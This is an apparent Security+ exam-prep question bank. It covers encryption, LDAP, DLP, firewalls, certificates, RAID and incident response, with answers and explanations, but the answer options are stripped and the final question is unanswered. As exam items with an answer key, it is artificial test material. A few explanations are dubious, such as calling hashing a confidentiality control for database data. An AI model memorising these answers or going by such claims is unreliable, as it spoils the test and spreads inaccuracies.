DES AES 3DES RC4 AES, DES, RC4, and 3DES are all symmetric encryption algorithms. ECC, RSA, and Diffie-Hellman are asymmetric encryption algorithms.

Your company deploys several LDAP servers, which is used to allow users to locate resources. What contains LDAP entries?

DIT Lightweight Directory Access Protocol (LDAP) entries are contained in a directory information tree (DIT), which is a hierarchical structure that can be searched for directory information. The start of the LDAP tree is called the root. LDAP is a directory service that enables users to find resources on a network, and it operates on well-known port 389. LDAP with SSL uses port 636. The purpose of LDAP authentication services is to provide a single point of user management. Answers B, A, and D are incorrect. LDAP Data Interchange Format (LDIF) enables LDAP servers to exchange directory information. LDAP can use Transport Layer Security (TLS) to secure LDAP transmissions. LDAP over TLS operates on well-known port 636. X.500 is a directory service specification on which LDAP is based. By default, LDAP communications between client and server applications are not encrypted, meaning that it would be possible to use a network monitoring device to view the communications traveling between LDAP computers. LDAP over Secure Sockets Layer (SSL) / Transport Layer Security (TLS), also known as LDAPS or Secure LDAP, will encrypt communications.

Your organization is attempting to reduce risk concerning the use of unapproved USB devices to copy files. What could you implement as a security control to help reduce risk?

DLP DLP (data loss prevention) methods are often implemented in scenarios where USB mass storage devices are utilized (such as USB flash drives and external hard drives). A storage-based DLP system monitors data at rest, and performs content inspection in order to prevent unauthorized use of the data. An IDS (intrusion detection system) is used to detect attacks and anomalies on the network. Content filtering is performed by proxy servers and Internet content filters—usually relating to Internet content. Auditing is when files and other resources are investigated in real time to see who accessed what and when.

Drag the network technology to its description.

DMZ: A network that is isolated from other networks using a firewall
VLAN: A network that is isolated from other networks by packet tagging
NAT: A transparent firewall solution between networks that allows multiple internal computers to share a single Internet interface and IP address
NAC: A network server that ensures that all network devices comply with an organization's security policy

Which algorithm is used as the digital signature for the US government, and was developed by NIST and the NSA?

DSA Digital Signature Algorithm (DSA) is the digital signature standard for the US government. It was published by the National Institute of Standards and Technology (NIST) and the National Security Agency (NSA). Answer D is incorrect. Galois Counter Mode (GCM) uses a special binary field (called a Galois field) to provide authenticated encryption. Answer A is incorrect. Electronic Codebook Mode (ECB) is a cipher mode where each block is independent of the next. With ECB, the symmetric algorithm is used without modification. Answer B is incorrect. Counter (CTR) Mode converts a block cipher (blocks of data) into a stream cipher (one bit at a time). It utilizes synchronous counters at the sender and the receiver. Another algorithm you need to understand for the Security+ exam is Diffie-Hellman. There are several groups (levels) of algorithms within Diffie-Hellman, with differing key lengths and methodologies. Diffie-Hellman groups 1, 2, and 5 are based on 768-bit, 1024-bit, and 1536-bit moduli, respectively, and their implementation should be avoided. The minimum acceptable group within Diffie-Hellman is group 14, which employs a 2048-bit modulus. Group 19 provides the next highest level of encryption with a 256-bit elliptic curve. Next Generation Encryption is achieved through implementation of groups 20 and 21, which use 384-bit and 521-bit elliptic curves, respectively.

Your company implements several databases. You are concerned with the security of the data in the databases. Which statement is correct for database security?

Data control language (DCL) implements security through access control and granular restrictions. Data control language (DCL) implements security through access control and granular restrictions. Answers B, A, and D are incorrect. Data identification language is not a valid database component. Data manipulation language (DML) is used to insert, retrieve, and modify the data contained within a database. Bind parameters are an alternative way to pass data to the database. Instead of putting the values directly into a SQL statement, you use a placeholder. They do not implement granular restrictions.

Which statement best describes data normalization?

Data normalization ensures that attributes in a database table depend on the primary key. Data normalization ensures that attributes in a database table depend only on the primary key. Normalization is required to prevent repetitive information from appearing in a database. This makes the database consistent and easy to maintain. Normalization is the process of eliminating redundant data from a relational database management system and storing the data at a single location. Normalization provides links to the data components whenever needed. The issues involved in normalization of a database are as follows: segregating related groups into separate tables; deleting redundant data from all the tables in a database; and ensuring that there is only one primary key per table and that all the attributes can be referred to by using this primary key. The process of normalization should be carried out carefully because dividing the data into multiple tables can break the consistency in retrieving information from the database and result in performance degradation. Database denormalization is the process of adding the redundant information to the tables to optimize the consistency and the performance of the database. Data denormalization is diametrically opposite to the data normalization process. The purpose of data denormalization is to increase the processing efficiency. Polyinstantiation is a method used to ensure that users with a lower access level are not able to access and modify data categorized for a higher level of access in a multi-level database. When polyinstantiation is implemented, two objects are created by using the same primary keys. One object is filled with incorrect information and is deemed unclassified, and the other object contains the original classified information. When a user with lower level privileges attempts to access the object, the user is directed to the object containing incorrect information. Polyinstantiation is used to conceal classified information that exists in a database and to fool intruders.

What is a default rule found in a firewall's ACL?

Deny All The deny all rule is a default rule found in a corporate firewall's access control lists (ACLs). It is an example of the implicit deny concept. Permit all is not a default rule, as that would be quite dangerous. Netsh advfirewall firewall is a command used in Windows to view personal firewall information. Add address=192.168.0.0/16 is a way to disable (or enable) private addressing space.

Which of the following methods will identify which network services are running on a computer?

Determine open ports By using a port scanner (and some vulnerability scanners), you can identify which ports are open on a computer (or other device), which in turn will tell you the corresponding services that are running on that computer. For example, if you see that port 80 is open, then you know that the HTTP service is running, and most likely that the computer is also acting as a web server. All other answers are incorrect because they are unrelated to identifying services running on a computer.

Management has recently expressed concern over port security. You have been asked to ensure that all network ports are as secure as possible. Which of the following methods of port security should you implement? (Choose all that apply.)

Ensure that TCP and UDP ports are managed properly. Ensure that wiring closets are locked. Ensure that the MAC addresses of connected devices are monitored. Port security is implemented on switches to ensure unauthorized devices cannot connect to the network through that port. Valid methods of port security include the following: Ensure wiring closets are locked - This ensures that rogue devices cannot be plugged into your network. Ensure that TCP and UDP ports are managed properly - This ensures that hackers cannot access your network via open TCP or UDP ports. Ensure that the MAC addresses of connected devices are monitored - This ensures that devices that connect to the network are identified. Media access control (MAC) addresses are used to uniquely identify network devices, including computers. Port knocking does provide some level of port security. The option regarding port knocking is incorrect because it states that you should NOT implement port knocking.

As a security administrator, you must be constantly vigilant and always be aware of the security posture of your systems. Which of the following supports this goal?

Establishing baseline reporting The key words of the question are "security posture." One of the best methods of monitoring the security posture of your systems is establishing baseline reporting. Baselining is the process of measuring changes in networking, hardware, software, and so on. Creating a baseline consists of selecting something to measure and measuring it consistently for a period of time. It is this baselining (and automated reporting with baselining tools such as Performance Monitor or Wireshark) that allows you to be vigilant and watch over your network carefully in real time. Disabling unnecessary services is an important security concept, but this refers to hardening the system, and reducing the attack surface. Training staff on security policies is educating the user and is extremely important when attempting to reduce the consequences of successful social engineering attacks. Installing anti-malware applications also hardens the system, and secures it in general against viruses, worms, Trojans, and other forms of malware.

What is the BEST method to avoid buffer overflows?

Execute a well-written program. A well-written program is the best method to prevent buffer overflow errors. A buffer overflow occurs when the length of the input data is longer than the buffer can handle. A buffer overflow is caused when input data is not verified for appropriate length at the time of input. Buffer overflow and boundary condition errors are examples of input validation errors. Answer C is incorrect. Audit trails and file integrity checks are examples of security controls in a trusted application system. Security controls cannot control buffer overflow, but can assist in monitoring unauthorized activity on either an application or a system. Answer D is incorrect. A check digit, also referred to as a checksum, provides data integrity by computing hash values. A checksum occurs when either a source application or a system uses a mathematical formula to compute a hash value against a standard input and sends the value to the destination. After receiving the data, the receiving application performs the same mathematical operation. If the hash values match, the data is considered acceptable. If the hash values do not match, the data is discarded. Check digits neither prevent nor detect buffer overflows. Answer A is incorrect. A reasonableness check verifies whether the data within an application program lies within the predefined limits and format. For example, an application meant for processing numbers should not accept alphabetical characters as valid input. Reasonableness checks monitor the data input format and not buffer overflows.

You are explaining to a new employee the proper process of evidence collection. As part of this explanation, you need to ensure that the new employee understands the evidence life cycle. Click to select the steps of the evidence life cycle, and then drag them into the correct order.

Explanation: Here are the steps of the evidence life cycle, in order: Collect, Analyze, Store, Present, Return.

You are designing security for a new e-commerce web site. You know that you will use HTTPS as the browser protocol. The legal team has asked you to validate using the name of the responsible legal entity in the certificate, to supply other validation parameters, and to provide a higher level of trust than domain validation. Which certificate would you use?

Extended validation certificate Extended validation certificates, as the name suggests, provide additional validation for HTTPS web sites. The certificate provides the name of the legal entity responsible for the web site. These certificates require the most effort by the CA to validate and provide a higher level of trust than domain validation because they are validated using more than the domain information. Answer B is incorrect. Machine/computer certificates are assigned to a designated machine. During authentication, the computer (or machine) requesting access must supply the certificate assigned to it. Answer A is incorrect. Email certificates are used to secure email. One such example is Secure Multipurpose Internet Mail Extensions (S/MIME), which provides a digital "signature" for that email. Root certificates define the root CA and validate all other certificates issued by that CA. They are at the top of the CA hierarchy. They are self-signed and are closely guarded. You should also be familiar with wildcard certificates, SAN fields, code signing certificates, user certificates, self-signed certificates, root certificates, and domain validation certificates. Wildcard certificates allow you to create a certificate in a domain, and use that same certificate for multiple subdomains. For example, if you had mail.mysite.com, ftp.mysite.com, and www.mysite.com, you could issue a wildcard certificate for mysite.com, and have it cover all the subdomains. Without the wildcard certificate, you would have to issue a certificate for each subdomain. Subject Alternative Name (SAN) is a field in the certificate definition that allows you to stipulate additional information, such as an IP address or host name, associated with the certificate. Code signing certificates are used for code that is distributed over the Internet, including programs or applications. Code signing certificates verify the code's origin and help the user trust that the claimed sender is indeed the originator. Self-signed certificates are digitally signed by the user. This is often provided by Microsoft Internet Information Services (IIS). The self-signed certificate will transmit a public key, but that key will be rejected by browsers. User certificates are assigned to individual users, much like machine/computer certificates are assigned to individual machines. Users must provide their assigned certificate for authentication prior to accessing certain resources. Domain validation certificates are very common. They are low-cost, and are often used by web admins to offer TLS to a domain. They are validated using only the domain name.

Which of the following descriptions is true concerning external security testing?

External security testing is conducted from outside the organization's security perimeter. Proper external security testing should be conducted from outside the organization's security perimeter, wherever that might be. It is generally outside of devices such as switches, routers, firewalls, and so on.

To achieve multifactor security, what should you implement to accompany password usage and smart cards?

Fingerprint readers The best answer is to use a biometric solution such as fingerprint readers. This is a different factor of authentication, and works well with smart cards and passwords. Biometric authentication falls into the factor category of something you are. The rest of the answers are within the categories of factors already mentioned in the question. Badge readers would be used with smart cards (or proximity cards) as would hard tokens; they are within the category of something you have. Passphrases are essentially the same as passwords; they are within the category of something you know.

Which of the following devices would most likely have a DMZ interface?

Firewall The firewall is the device most likely to have a separate DMZ interface. Switches connect computers on the LAN. VoIP phones are used by individuals to make and answer phone calls on a Voice over IP connection. A proxy server acts as a go-between for the clients on the LAN and the web servers that they connect to, and caches web content for faster access.

You suspect that files are being illegitimately copied to an external location. The file server that the files are stored on does not have logging enabled. Which log should you access to find out more about the files that are being copied illegitimately?

Firewall log The firewall log can help you find out whether files are being illegitimately copied to an external location. This is the only log listed that can give you any information about files being copied to an external or remote location. The DNS log can help you find out whether unauthorized zone transfers or DNS poisoning has occurred. The antivirus log shows what viruses have been detected and quarantined on a system. The System log is a log file within the Event Viewer that provides information about the operating system and device drivers.

Jennifer has been tasked with configuring multiple computers on the WLAN to use RDP on the same wireless router. Which of the following might be necessary to implement?

Forward each computer to a different RDP port. If there are multiple computers allowing incoming Remote Desktop Protocol (RDP) sessions on the WLAN, you might have to configure the wireless router to forward each computer to a different RDP port. For example, the standard RDP port is 3389 (also known as Terminal Services). If that is open on the router, then clients on the Internet will be able to initiate RDP sessions to your network. But usually, the port on the router can only be forwarded to one computer. It might be necessary to set up additional port numbers and have each one map to a separate computer on the WLAN. Of course, the users on the Internet would need to know the special port number that corresponds to the computer they want to connect to. Often this will be used for remote access by the employee who would otherwise be working at the computer in the office. You would not normally create a DMZ for each computer, and this would make it difficult to configure so that the computers could communicate with each other. Turning off port forwarding would make the situation worse and would stop any remote connections from flowing through the router. AP isolation would also separate the wireless clients and would not have an effect on the goal at hand.

In the event that a mobile device is stolen, what two security controls can prevent data loss? (Select the two best answers.)

Full device encryption Screen locks Screen locks (especially the password and passcode variety) can make it difficult for an attacker to get to the data stored on the device. Better yet, full device encryption will make it virtually impossible to read the data. These are the best options, but not the only options. For example, a security administrator might opt to install a remote wipe program. Once it is known the mobile device has been stolen, the admin can trigger the wipe from a central location. However, there is a time delay concerning this method, so it should be used with the previous techniques. From a security standpoint, a global positioning system (GPS) is usually more of a hindrance than a security control. It might help in recovering the device, but by that point the damage has probably already been done. Inventory control and the tracking of assets are important (and are sometimes done with the aid of GPS), but remember that an unprotected mobile device can have its data downloaded by an attacker in a matter of minutes. So these things are great from a management standpoint, but not from a security standpoint.

You have been tasked with sending a decommissioned SSL certificate server's hard drives to be destroyed by a third-party company. What should you implement before sending the drives out? (Select the two best answers.)

Full disk encryption Disk wiping You don't want anyone else to get a hold of your SSL certificates, even if they are expired. The best solution in the scenario is to either destroy the drives yourself or store them in a secure location for a period of time. However, if you are sending them to a third party for destruction, the best option would be to fully wipe the drives; sanitize them with powerful software, and strong methods such as the Gutmann method. Barring that, you would want to consider full disk encryption (FDE) that utilizes AES or another powerful cipher. This way, the third party, and anyone else between you and the third party, will not be able to learn the RSA keys that the certificates are based on. A data retention policy states how long data must be stored by an organization. If the drives are going to another company, then this policy is moot in this case. The server's hard drives that are referred to in the question are most likely internal drives, so removable media encryption (for things such as USB flash drives) has no bearing here. Disk hashing is not necessary. You are not interested in the data anymore, so there is no reason to hash it.

A co-worker's laptop has been compromised. What is the best way to mitigate data loss?

Full disk encryption Full disk encryption is the best way (listed) to mitigate data loss in the case of a stolen or otherwise compromised laptop because it will be difficult to decrypt the data on the laptop. A Common Access Card is a smart card/photo ID used by the DoD. Strong passwords are a good idea on portable devices but can be cracked or circumvented more easily than a full disk encryption solution. Biometric authentication can also be cracked given enough time.

You have been hired as a security consultant for a large corporation. During a meeting with the IT department, the IT manager indicates that one of their applications uses a private key encryption standard that was developed in Russia and uses 256-bit encryption keys. Which encryption standard does the application use?

GOST GOST is a Russian private key encryption standard that uses a 256-bit encryption key. GOST was developed as a counter to the Data Encryption Standard (DES). CAST-128 is a private key encryption standard that is used in Pretty Good Privacy (PGP). International Data Encryption Algorithm (IDEA) is a private key encryption standard that was developed in Switzerland. IDEA is used in PGP, and uses 128-bit encryption keys. RC5 is a private key encryption standard that was developed at the Massachusetts Institute of Technology. RC5 supports variable length encryption keys.

Your high-tech server room needs a quality fire suppression system. What is the most appropriate type of fire suppression system to install?

Gaseous fire suppression A gaseous fire suppression system is the best way to go in this scenario. Server room equipment can be easily damaged by other types of systems. An example of a gaseous fire suppression system would be FM-200. A less powerful example would be a CO2 fire extinguisher. Some municipalities require that a sprinkler system be installed, even if a gaseous fire suppression system has already been installed in the server room. If this is the case, a dry pipe sprinkler system will be installed in addition to the gaseous fire suppression system. Multipurpose dry chemical fire extinguishers can be extremely messy and can damage server room equipment easily and therefore should not be used. Wet chemical suppression is even worse. These and water-based fire extinguishers should not be used in server rooms.

A security administrator is required to submit a new CSR to a CA. What is the first step?

Generate a new private key based on RSA When a person is required to submit a CSR (certificate signing request) to a CA (certificate authority), the first step—before generating the CSR—is to create a private key. This will be an asymmetric key such as RSA, commonly a 2048-bit key. (In fact, since the end of 2013 it is mandated that the key be 2048-bit or larger.) The next steps are to generate the CSR, submit the CSR for signing (the crucial part of the process), and finally install the signed certificate. It is important to keep the original RSA private key safe and secure. No one, including the CA, should know the RSA key. The CA should only know the CSR generated, which is based on the private RSA key. Symmetric keys such as AES are not used for this process; asymmetric keys such as RSA are the standard. The security administrator must use and keep safe a private key that only he or she knows. Later, when people connect to the organization's website or network, they will make use of the public key portion.

Which of the following is a removable device that can be used to encrypt in a high-availability, clustered environment?

HSM An HSM (hardware security module) is a device used to manage digital keys and provide authentication. It can be connected to a computer, a server, or a particular server in a clustered environment. Biometrics is the science of authenticating individuals by their physical traits. A cloud computer is a computer that resides on the Internet and is run by a third-party service provider that offers various computing services to individual users and small to midsized companies. A TPM is a trusted platform module that is similar to an HSM but is internal to the computer, perhaps as a chip on the motherboard.

Which device is used to encrypt the authentication process?

HSM An HSM (hardware security module) is a physical device that acts as a secure cryptoprocessor. It is used for the digital signing of data and login/authentication processes. WPA (Wi-Fi Protected Access) is a wireless protocol. An Enigma machine is a machine that was used in World War II for the encryption/decryption of secret messages. Smart cards are used to authenticate individuals, but an HSM offers faster software encryption.

A security administrator analyzed the following logs:
Host: 10.248.248.67
[02:15:11] Successful Login: 045 10.248.248.67:local
[02:15:16] Unsuccessful Login: 067 208.159.67.23:RDP 10.248.248.67
[02:15:16] Unsuccessful Login: 072 208.159.67.23:RDP 10.248.248.67
[02:15:16] Unsuccessful Login: 058 208.159.67.23:RDP 10.248.248.67
[02:15:16] Unsuccessful Login: 094 208.159.67.23:RDP 10.248.248.67
What should the security administrator implement as a mitigation method against further attempts?

Hardening It appears that an external IP address (208.159.67.23) is attempting to connect remotely to the local computer (10.248.248.67), possibly using the Remote Desktop Connection program. The connections were unsuccessful, but hardening is required at the local system and at the firewall to ensure that this IP address cannot connect through to the local computer. Services should be analyzed and, if necessary, shut down at the local computer. Ports should be scanned and, if necessary, closed at the firewall. System log monitoring is incorrect because the logs are present, and they have been monitored and analyzed, resulting in the answer that additional hardening is necessary. An IDS (intrusion detection system) looks for attacks and will notify an administrator (and possibly shut down a firewall if necessary), but it is not working correctly at this point. To truly mitigate the problem, the IDS should be reconfigured and hardened, or an IPS (intrusion prevention system) should be implemented. Reporting, along with the logs, seems to be working properly.

Robert has been asked to make sure that a server is highly available. He must ensure that hard drive failure will not affect the server. Which of the following methods allows for this?

Hardware RAID 5 Software RAID 1 RAID 1 (mirroring) and RAID 5 (striping with parity) are both fault-tolerant methods that will allow for high availability and ensure that hard drive failure will not affect the server. True clustering is when multiple computers' resources are used together to create a faster, more efficient system; it often uses load balancing to accomplish this. However, true clustering does not necessarily allow for fault tolerance of data. RAID 0 (striping) is not fault tolerant because there is no parity information.

The security administrator has added the following information to a SOHO router:
PERMIT 00:1C:C0:A2:56:18
DENY 01:23:6D:A9:55:EC
Now, a mobile device user reports a problem connecting to the network. What is preventing the user from connecting?

Hardware address filtering has been implemented. The security administrator denied one MAC address at the SOHO router: 01:23:6D:A9:55:EC. This is most likely the MAC address of the mobile device that cannot connect to the network. Individual octets of a MAC address are often separated by colons when working in a router. However, in an operating system such as Windows they are often separated by hyphens. Be able to identify both. Note that the admin also permitted (or allowed) a particular MAC address to connect to the network. Access control lists (ACLs), or rules, such as these are created on the router to allow or disallow access. Port filtering could mean physical ports or logical TCP/IP ports such as port 80 HTTP. IP address filtering means that entire IP addresses (such as 10.254.254.101) have been filtered out. Both of these answers are incorrect because this scenario clearly deals with MAC addresses. WPA2-PSK is a method of connecting, but the "PSK" portion implies that it does not require a supplicant the way a technology such as 802.1X does. PSK means pre-shared key, a key that the admin selects and inputs into the router, which the user must know in order to connect to a wireless network.

Which of the following best describes a TPM?

Hardware chip that stores keys A TPM (trusted platform module) is a chip that resides on a motherboard that stores encrypted keys used to encrypt the entire hard drive of a computer. A hardware security module (HSM) is an example of a high-speed secure removable storage device. An example of a third-party certificate authority (CA) is a company such as VeriSign that develops and distributes trusted certificates. USB encryption is a removable type of encryption; for example, a USB flash drive might be encrypted with AES-256 to keep data secure.

You have been asked by your boss to protect the confidentiality of sensitive data entered into a database table. What is the quickest and easiest method to use?

Hashing Hashing is used in databases for indexing and file retrieval and is used to protect the confidentiality of data in database tables. It is faster and easier to use than encryption methods. Encryption is commonly used to protect the confidentiality of data files but is perhaps not the quickest and easiest method for information that is integral to database tables. Secure Copy (SCP) is used to securely transfer files between two computers. Biometrics is the science of identifying humans from their physical characteristics.

Your organization has decided to move large sets of sensitive data to a SaaS cloud provider in order to limit storage and infrastructure costs. Your CIO requires that both the cloud provider and your organization have a clear understanding of the security controls that will be implemented to protect the sensitive data. What kind of agreement is this?

ISA An ISA is an interconnection security agreement. It is an agreement that is established between two (or more) organizations that own and operate connected IT systems and data sets. Its purpose is to specifically document the technical and security requirements of the interconnection between the organizations. This is the type of agreement you need in this scenario because the data is sensitive and the CIO requires that there is a clear understanding of security controls to be implemented and agreed upon. An SLA (service level agreement) is a contract between a service provider and a customer that specifies the nature of the service to be provided and the level of service that the provider will offer to the customer. It can be a very basic agreement, or it could also state the technical and performance parameters, but it will probably not include any specific security controls. An MoU is not an agreement at all, but a memorandum of understanding between two organizations or government agencies. It does not specify any security controls either. A BPA (business partners agreement) is a type of contract that can establish the profits each partner will get, what responsibilities each partner will have, and exit strategies for partners. Note that you might see the acronym BPA used for other things as well in the business and IT worlds.

Which process allows you to deploy, configure, and manage data centers through scripts?

IaC Infrastructure as code (IaC) is the process of using definition and configuration files to provision and manage data centers. Automating this process through scripts can ensure that there is more control and less opportunity for error when deploying servers, as compared with manual configuration. IaC is the foundation for secure DevOps. Security Development Operations (DevOps) means that security is built into all your development operations. Answer A is incorrect. Baselining allows you to know how software (or hardware, for that matter) performs under normal load situations. That behavior is known as metrics. When you add new services, you are able to determine what effect those services have on system performance. Because baselining is passive, it would not allow you to configure or manage data centers. Answer D is incorrect. When comparing waterfall to the agile development life-cycle model, waterfall uses tightly defined processes that are executed in a linear sequence. Agile is a cyclical methodology where development phases are iterative and each cycle moves the project a little closer to the final product. Because these are project management models, neither would be appropriate for managing data centers on an ongoing basis through scripts. Answer C is incorrect. Immutable systems are those where the configuration is static and may not be changed. This would not be appropriate for a data center environment where configurations may change to address security concerns. Other secure application development issues include security automation and continuous integration. Security automation occurs with agile software development. When automated security is integrated into agile development, security can be implemented effectively with ease during product development, rather than retrofitting security to a completed product. Continuous integration merges updated source code from multiple developers into a shared repository on a regular basis.
When code is checked in, it is automatically verified so that problems are detected early. Continuous integration often results in security issues not being discovered and resolved because the appropriate personnel do not review for security issues.

The helpdesk department for your organization reports that there are increased calls from clients reporting malware-infected computers. Which of the following steps of incident response is the most appropriate as a first response?

Identification The first response within the incident response that should be taken in this scenario is identification. The malware needs to be identified, the computers affected need to be identified, and so on. Identification is usually the first step of an organization's incident response process. An example of the main phases of incident response is as follows: Preparation, Identification, Containment, Eradication, Recovery, Lessons learned. (This list can vary from one organization to the next and from one standardization body to the next.) A pre-step to this list is preparation—being ready with tools, knowledge, and training before an incident occurs. Validation can occur during steps 5 through 7, depending on the type of validation. Follow-up can be considered part of the documenting and monitoring step.

Which option includes verifying appropriate access controls, authentication controls, input validation, and proper logging, among others?

Identifying a lack of security controls When you scan to identify a lack of security controls, you are looking for the presence or absence of appropriate access controls, authentication controls, input validation, proper logging, and other security considerations. Answers B, A, and D are incorrect. When you passively test security controls, you are performing a vulnerability scan to identify weaknesses, but not exploiting those weaknesses. Vulnerability scans do not usually test controls; rather, they test operating systems, devices, and other components for any known vulnerabilities that may exist. When you attempt to identify common misconfigurations, you are looking for things like a router that still has the default administrative password. A false positive can occur when a vulnerability is identified that, in reality, is not a vulnerability.

During the recent development of a new application, the customer requested a change. You must implement this change according to the change control process. What is the first step you should implement?

Impact Assessment You should analyze the change request. The change control procedures ensure that all modifications are authorized, tested, and recorded. Therefore, these procedures serve the primary aim of auditing and review by management. The necessary steps in a change control process are as follows:
Change request initiation and control: Requests for changes should be standardized and subject to management review, and the change requestor should be kept informed.
Impact assessment: Make sure that all requests for change are assessed in a structured way to analyze possible impacts.
Control and documentation of changes: A change log should be maintained that records the date, the details of the person who made the changes, and the changes implemented; only authorized individuals should be able to make changes; a process for rolling back to the previous version should be identified.
Documentation and procedures: Whenever system changes are implemented, the procedures and associated documents should be updated accordingly.
Authorized maintenance: System access rights should be controlled to avert unauthorized access.
Testing and user sign-off: Software should be thoroughly tested.
Version control: Controls should be placed on production source code to make sure that only the latest version is updated.
Emergency changes: A verbal authorization should be obtained, and the change should be documented as soon as possible.
A stringent change management process ensures that all changes related to production systems are implemented and recorded, and enforces separation of duties. For instance, in a software development environment, changes made to production software programs are performed by operational staff rather than the software programmers, who are responsible for coding software applications for clients. Such a process ensures that the changes are implemented in the proper manner and the process is documented.
Change management is about the decision to make the change. Configuration management is not the same as change management. Configuration management is about tracking the actual change. It is the discipline of identifying the components of a continually evolving system for the purposes of controlling changes to those components and maintaining integrity and traceability throughout the life cycle. Configuration management controls the changes that take place in hardware, software, and operating systems by assuring that only the proposed and approved system changes are implemented. In configuration management, a configuration item is a component whose state is to be recorded and against which changes are to be progressed. In configuration management, a software library is a controlled area accessible only to approved users who are restricted to the use of an approved procedure. Configuration control is controlling changes to the configuration items and issuing versions of configuration items from the software library. Configuration management includes configuration control, configuration status accounting, and configuration audit. Version control is associated with change management. When changes are implemented in an application, developers need to ensure that proper version control procedures are followed. In most organizations, there will be version control procedures for both minor and major changes. Maintaining proper version control will help ensure that the appropriate version is deployed on systems.

Which of the following will stop network traffic when the traffic is not identified in the firewall ruleset?

Implicit deny The principle of implicit deny is used to deny all traffic that isn't explicitly (or specifically) allowed or denied. In other words, if the type of traffic hasn't been associated with a rule, the implicit deny rule will kick in, thus protecting the device. Access control lists are used to filter packets and will include rules such as permit any or explicit denies to particular IP addresses.

While developing an incident response plan for your client, you outline the roles and responsibilities of a cyber response team. You also describe the establishment and formation of that team. What time frame should you specify for the formation of a cyber-incident response team?

In advance of an incident occurring Members of a cyber-incident response team should be designated well in advance of an incident occurring. The members should be selected based on their particular area of expertise. The teams should practice responses to various security incidents. The cyber-incident response team is an important part of the incident response plan. The incident response plan should include the roles and responsibilities of the members of the incident response team. Each role and responsibility should be clearly defined. For example, first responders should be responsible for securing the scene to preserve evidence. Incident handlers should gather evidence, secure or seize equipment, and document the scene. A designated spokesperson should be the point of contact for the media, and deliver the appropriate message on behalf of the company. You would not specify that a cyber-incident response team be formed when enough qualified individuals are available or only in response to an incident that has occurred. An incident response plan should also include reporting requirements and escalation guidelines. The reporting requirements would indicate how incidents are reported, what documentation is required, and what outside agencies (if any) should be notified. Escalation guidelines would indicate under what circumstances you need to ask for additional assistance. When an incident response plan is put into action, the final outcome should be a documented incident. Among the factors to include would be what happened, who responded, what the damage was, what type of incident occurred, and what escalation was taken. An exercise requirement should be included in an incident response plan. By using a mock incident as an exercise or drill, this would allow for training and evaluation of the effectiveness of a response or containment activity. An incident response plan should outline the incident types and category definitions.
These definitions help dictate how the incident is handled, what actions the incident response team should take, and data collection and evidence gathering. For example, an incident response plan should define incident types that would be handled internally and incident types that should be turned over to law enforcement. You would also categorize the incident types by severity of impact, with each category having clearly defined response times, which resources would be assigned to the incident, and what should be done to prepare for the possibility of that incident.

You are analyzing why the incident response team of your organization could not identify a recent incident that occurred. Review the e-mail below and then answer the question that follows.
E-mail from the incident response team:
A copyright infringement alert was triggered by IP address 11.128.50.1 at 02:30:01 GMT. After reviewing the following logs for IP address 11.128.50.1, we cannot correlate and identify the incident.
- 02:25:23 11.128.50.1 http://externalsite.com/login.asp?user=steve
- 02:30:15 11.128.50.1 http://externalsite.com/login.asp?user=amy
- 03:30:01 11.128.50.1 http://externalsite.com/access.asp?file=movie.mov
- 03:31:08 11.128.50.1 http://externalsite.com/download.asp?movie.mov=ok

Incident time offsets were not accounted for. In this scenario, the copyright infringement alert was triggered at 02:30:01 GMT. This means that it happened at 2:30 AM (during the first second) and that the incident, and the logs, are based on GMT (Greenwich Mean Time), the global time standard. Note the third log shows that a movie file was accessed at 03:30:01. There is exactly a one-hour difference between the copyright infringement alert and the log file that shows the file access that occurred (which is the infringement). This could be due to the fact that the server hosting the file has its time based on a different time zone. There are several other possibilities why the incident time offset occurred, but it did occur. When scanning for incident time offsets (because your log files will probably be large), look for incidents that happened during the same minute and second, but on a different hour. Ultimately, what you (and the incident response team) need to find out is who downloaded the movie and triggered the copyright infringement. It could be that Amy was the downloader, based on the time offset, but you would need to analyze the situation further to be sure. The logs are certainly not corrupt, and they are definitely available, because the incident response team was able to access them and send them (or a copy of them) to you to review. You don't know if the chain of custody was properly maintained. It is beyond your understanding because the incident response team has the log files. You only received a copy of some of the log file information.

Which of the following techniques supports availability when considering a vendor-specific vulnerability in critical industrial control systems?

Incorporating diversity into redundant design The key word in the question is availability. One of the best ways to encourage availability is to have redundancy. The more diverse the redundancy, the more fault tolerant the system. Some industrial control systems do not have the option to run AV software, but even if they did, AV software does not promote availability directly. It helps to secure from viruses and other malware, but it is not a method of fault tolerance. Multiple firewalls, for example a back-to-back perimeter configuration, will help to block network-based attacks, but also do not increase availability. Application whitelists, if not configured properly, could actually reduce availability. They are meant to restrict users to specific allowed applications.

Your organization has suffered from several data leaks as a result of social engineering attacks that were conducted over the phone. Your boss wants to reduce the risk of another leak by incorporating user training. Which of the following is the best method for reducing data leaks?

Information security awareness Information security awareness means training users on how to: screen calls and e-mails; not to give out personally identifiable information (PII); not to share confidential organizational data; and in general, to protect data and PII. This will be the best method for reducing the chances of another data leak due to social engineering attacks. By the way, if the social engineering attacks were conducted by phone, the attack type is known as vishing, a form of phishing. The use of social media and the option to bring your own device (BYOD) often lead to increased social engineering (in the form of spim, phishing, and possibly pharming), and additional security is required to meet that threat. When it comes to BYOD, the main security concern is that there is a lack of controls in place to ensure that the devices have the latest system patches and signature files. Mobile device management (MDM) systems can alleviate that situation. Acceptable use is usually stated in policy form, and basically describes what people are allowed to do with company-owned computers and data. Though adherence to this policy can potentially help to reduce data leaks, it is not the best or most effective solution. Note: This is an example of a question for which two answers could arguably be correct. When taking the CompTIA Security+ exam, be sure to analyze the question carefully and select the best answer for most situations. Data handling and disposal is also important, but training in them won't reduce the type of social engineering attack in the question that was perpetrated on the organization; that attack was vishing. However, data handling policies can help with shoulder surfing, dumpster diving, and a variety of other attacks.

A security auditing consultant has completed a security assessment and gives the following recommendations: Implement fencing and additional lighting around the perimeter of the building. Digitally sign new releases of software. Categorically, what is the security consultant recommending? (Select the two best answers.)

Integrity Safety The fencing and additional lighting are for employee safety, especially at night. Digitally signing software, or anything else, speaks to keeping the integrity of the software intact. Hashing is another concept that could be implemented. Encryption would infer confidentiality. If the security consultant were to say that data is not secure in transit or at rest, then encryption would be a viable option. Fault tolerance infers availability. If the security consultant were to say that there are too many single points of failure, then fault-tolerant methods such as a redundant array of inexpensive [or independent] disks (RAID) array would be worth considering.

What does an incremental backup do?

